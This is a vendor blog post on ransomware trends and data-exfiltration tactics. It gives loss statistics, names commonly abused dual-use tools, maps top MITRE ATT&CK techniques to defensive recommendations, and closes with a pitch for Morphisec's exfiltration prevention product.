Ransomware Evolution and Data Exfiltration: A Deep Dive for Cybersecurity Analysts 

Ransomware has evolved from a nuisance to one of the most devastating cyber threats in existence. 

Over the last decade, attackers have professionalized their operations, adopting sophisticated tactics like double and triple extortion. These methods combine data encryption with data exfiltration and the threat of public disclosure, making even well-backed organizations with robust backups highly vulnerable. 

This blog provides a detailed analysis of ransomware trends, techniques, and tools based on insights from Morphisec and third-party primary research. We’ll explore critical findings, the tools and techniques ransomware operators use for data exfiltration, and actionable recommendations for cybersecurity analysts to combat this growing threat. 

Ransomware’s Rise: A Statistical Overview 

Ransomware has cemented itself as one of the most disruptive forces in today’s cyber threat landscape. Between 2019 and 2023, it was behind nearly one-third of all security incidents, according to Cyentia’s IRIS report. Even more alarming, ransomware was responsible for 38% of all financial losses from cyber events during that same period.  

Smaller organizations—those with under $100 million in revenue—have been hit especially hard, with ransomware making up 30–40% of incidents in this group. For attackers, the draw is clear: ransomware offers a quick path to monetization, and double extortion tactics—stealing data before encryption—amplify both the financial and reputational damage to victims. 

The economic toll of ransomware has skyrocketed over the past five years. In 2019, the average cost of a ransomware incident was $686,000. By 2023, that number had surged to $3.7 million—a staggering 440% increase. At the extreme end, the most severe incidents (in the 95th percentile) can cost organizations up to $50 million each. Over a five-year span, ransomware events racked up an estimated $276 billion in total losses, reflecting a 140-fold increase in financial impact over the past decade. 

For security practitioners, these statistics aren’t just historical markers—they’re a call to action. They highlight the growing scale, sophistication, and business impact of ransomware, underscoring the need for robust prevention, rapid detection, and well-rehearsed response plans.  

Understanding the trajectory of ransomware’s rise helps defenders anticipate its evolution and better prepare their organizations for the threats ahead. 

Data Exfiltration: A Key Component of Ransomware 

Ransomware has evolved far beyond simply locking up a victim’s files.  

Today, most major ransomware operations pair encryption with data theft—stealing sensitive information before encrypting it and then threatening to leak or sell it if the ransom isn’t paid. This “double extortion” model has become the industry standard for cybercriminals, making attacks far more damaging and difficult to recover from.  

Some groups have gone even further, using “triple extortion” tactics to pressure victims by targeting their customers, partners, or other third parties linked to their business. For security practitioners, this shift means the impact of a ransomware attack can ripple far beyond the initial compromise, escalating reputational damage, regulatory risk, and financial fallout. 

To carry out these attacks, adversaries are increasingly relying on a mix of purpose-built malware and “dual-use” tools—legitimate software co-opted for malicious ends. Symantec’s research shows that dual-use tools now dominate the ransomware data exfiltration playbook, giving attackers stealth, flexibility, and the ability to blend in with normal network activity.  

Symantec found that most frequently abused tool is Rclone, an open-source cloud storage manager that lets attackers quickly move stolen data to platforms they control. Remote access tools such as AnyDesk, ScreenConnect, and Atera are also common, enabling attackers to quietly transfer data and move laterally across the network. Tools like Cobalt Strike—originally designed for penetration testing—help establish covert channels that mimic legitimate traffic, making detection even harder. 

Attackers also use file compression and encryption tools like WinRAR and 7-Zip to package data for exfiltration, backup utilities like Restic to push stolen data to cloud storage providers such as Amazon S3 or Google Cloud, and tunneling tools like Chisel to create encrypted links to their own infrastructure. To make these tools harder to spot, they’ll often rename executables—for example, disguising “Rclone.exe” as “svchost.exe”—so they appear to be legitimate system processes. 

For defenders, understanding these tools and tactics isn’t just a matter of threat intelligence—it’s a blueprint for building better detection and prevention strategies. Knowing what attackers are likely to use, and how they try to hide it, helps practitioners tune defenses, hunt for early warning signs, and shut down exfiltration before the ransom note even appears. 

Ransomware Campaigns and Techniques 

The Big Names Behind the Biggest Breaches 

Over the past five years, a handful of ransomware groups have dominated the threat landscape—Cl0p, LockBit 3.0, Conti, and ALPHV/BlackCat. These aren’t just opportunistic hackers; they’re highly organized operations that innovate constantly to stay ahead of defenses.  

Groups like Cl0p have shown how quickly they can scale their attacks by exploiting a single high-profile vulnerability—such as the MOVEit file transfer flaw—to compromise hundreds of organizations in one campaign.  

For practitioners, knowing these names isn’t just trivia; it’s essential situational awareness. Tracking their methods, infrastructure, and favorite exploits can help defenders anticipate—and block—their next move. 

Their Favorite TTPs—and Why They Work 

Ransomware operators tend to follow a predictable playbook, but it’s a playbook that works frighteningly well. Here are the top 10 techniques, as aligned to MITRE ATT&CK:   

Initial Access 

• T1190 – Exploiting Public-Facing Applications: Attackers exploit vulnerabilities in internet-facing applications as a primary entry point. Regular patching and hardening of web applications are crucial to mitigate this risk. 
• T1566 – Phishing: Social engineering via phishing emails remains a common tactic to deliver malware or steal credentials. Despite modern defenses, well-crafted phishing campaigns still penetrate organizations. 
• T1133 – Exploiting External Remote Services: Weak configurations in RDP, VPN, or other remote access services allow attackers easy access. Enforcing MFA and monitoring remote access traffic are essential for protection. 

Post-Compromise 

• T1059 – Command and Scripting Interpreter: Attackers use tools like PowerShell and Bash to execute commands undetected. Tightening script policies and monitoring script activity can disrupt their plans. 
• T1562 – Impair Defenses: Disabling antivirus, firewalls, and endpoint detection tools is a common first step post-compromise. Logging these actions provides critical early warning signs of an attack. 
• T1489 – Service Stop: Critical services, including EPP/EDR and backup solutions, are often stopped to ensure successful encryption. Monitoring for unexpected service stoppages can help identify suspicious activity. 

Exfiltration and Impact 

• T1486 – Data Encrypted for Impact: Encrypting victim data is central to ransomware attacks, disrupting operations and increasing leverage over victims. 
• T1490 – Inhibit System Recovery: Attackers delete backups and shadow copies to make recovery efforts impossible without paying the ransom. Regularly testing and securing offline backups is essential. 
• T1567 – Exfiltration Over Web Service: Stolen data is uploaded to attacker-controlled cloud services for double extortion. Monitoring outbound traffic for unusual uploads is key to detecting this activity. 
• T1048 – Exfiltration Over Alternative Protocol: Attackers use DNS tunneling or other non-standard protocols to exfiltrate data while evading detection. Analyzing network traffic for anomalies can uncover these tactics. 

For practitioners, understanding these TTPs is about more than threat intel—it’s about mapping them to your own environment so you can detect, disrupt, and contain them faster. 

Sector-Specific Insights 

Some industries simply have more to lose—or are easier to disrupt. Manufacturing, Transportation, and Education top the list, with ransomware responsible for 80% of all cyber losses in these sectors. Healthcare and Hospitality are also frequent targets, thanks to their combination of sensitive data and operational urgency. 

For smaller businesses (under $100M in revenue), ransomware is a far more common occurrence—accounting for 30–40% of breaches. Large enterprises may face fewer incidents, but their attacks tend to be more complex and may hit multiple times in a single year.  

For practitioners, this means defenses must be scaled to your risk profile: SMBs need affordable, layered security that stops the most common entry points, while large enterprises must prepare for sustained, multi-vector campaigns. 

Defensive Strategies That Work 

1. Monitor and Mitigate Dual-Use Tools: Since attackers often use legitimate tools for malicious purposes, application whitelisting can block unauthorized executables, while behavioral monitoring can flag suspicious activity like massive file transfers. Locking down scripting environments—such as enabling PowerShell constrained language mode—can cut off one of their most versatile tools. 
2. Harden Remote Access Solutions: Limit RDP to specific IP ranges, enforce MFA, and audit VPN/RDP logs regularly. Given how often attackers exploit these services, a weak configuration here is like leaving your front door wide open. 
3. Strengthen Data Backup Practices: Immutable backups—stored offline or in write-once media—are your insurance policy against encryption. Regular restoration testing ensures they’ll actually work when you need them most. 
4. Detect and Respond to Exfiltration: Outbound traffic monitoring is non-negotiable. Large transfers to unfamiliar IPs or cloud services should be a red flag. Data Loss Prevention (DLP) tools can add another layer of visibility and control. 
5. Sector-Specific Safeguards: High-risk industries like Manufacturing and Healthcare should prioritize network segmentation to slow down lateral movement. Smaller organizations can tap into free resources like StopRansomware.gov for practical guidance and playbooks. 

Flipping the Script on Cyber Extortion 

Modern ransomware has evolved beyond encryption—it’s an extortion scheme that weaponizes stolen data. Attackers now routinely combine double and triple extortion tactics with methods like data encryption for impact, disabling recovery mechanisms, and exfiltration via web services, scripts, cloud accounts, and more—covering up to 97% of ransomware incidents.  

For practitioners, this means the old playbook (detect and respond) is no longer sufficient. You need to stop attacks before they can gain leverage. 

That’s where Morphisec’s Exfiltration Prevention comes into play. Powered by Automated Moving Target Defense (AMTD) and Adaptive Exposure Management (AEM), it delivers a proactive, signatureless strategy that takes the fight to the attackers—before they even start exfiltrating data. 

Here’s why this matters for security practitioners: 

• Stops ransomware and data theft before execution: Morphisec neutralizes ransomware payloads and blocks a wide range of tactics—from encrypting data and disabling backups to cloud exfiltration, script-based theft, DNS tunneling, and USB-based transfers. 
• Covers the full exfiltration playbook: This solution addresses the top 10 MITRE ATT&CK techniques tied to exfiltration and impact, providing broader protection than traditional reactive tools.
• Signatureless, prevention-first approach: Without relying on behavioral analysis or IOC databases, Morphisec remains effective against novel and evasive threats—limiting dwell time and reducing alert fatigue. 
• Enables business continuity and resilience: By stopping threats early, preserving recovery tools, and neutralizing exfiltration attempts, it helps maintain operations, reduce regulatory exposure, and shield sensitive data—even before attackers can act. 

In short, Morphisec doesn’t just reinforce your defenses—it redefines them. It shifts your security posture from reaction to disruption, turning ransomware’s own strategies against it before they can cause damage. For practitioners, that means real control, far less chaos, and a powerful leap ahead in cyber resilience. 

Learn more about Morphisec’s Impact Protection capabilities and schedule a demo to see it in action. 

About the author

Brad LaPorte

Chief Marketing Officer

Brad LaPorte is a seasoned cybersecurity expert and former military officer specializing in cybersecurity and military intelligence for the United States military and allied forces. With a distinguished career at Gartner as a top-rated research analyst, Brad was instrumental in establishing key industry categories such as Attack Surface Management (ASM), Extended Detection & Response (XDR), Digital Risk Protection (DRP), and the foundational elements of Continuous Threat Exposure Management (CTEM). His forward-thinking approach led to the inception of Secureworks’ MDR service and the EDR product Red Cloak—industry firsts. At IBM, he spearheaded the creation of the Endpoint Security Portfolio, as well as MDR, Vulnerability Management, Threat Intelligence, and Managed SIEM offerings, further solidifying his reputation as a visionary in cybersecurity solutions years ahead of its time.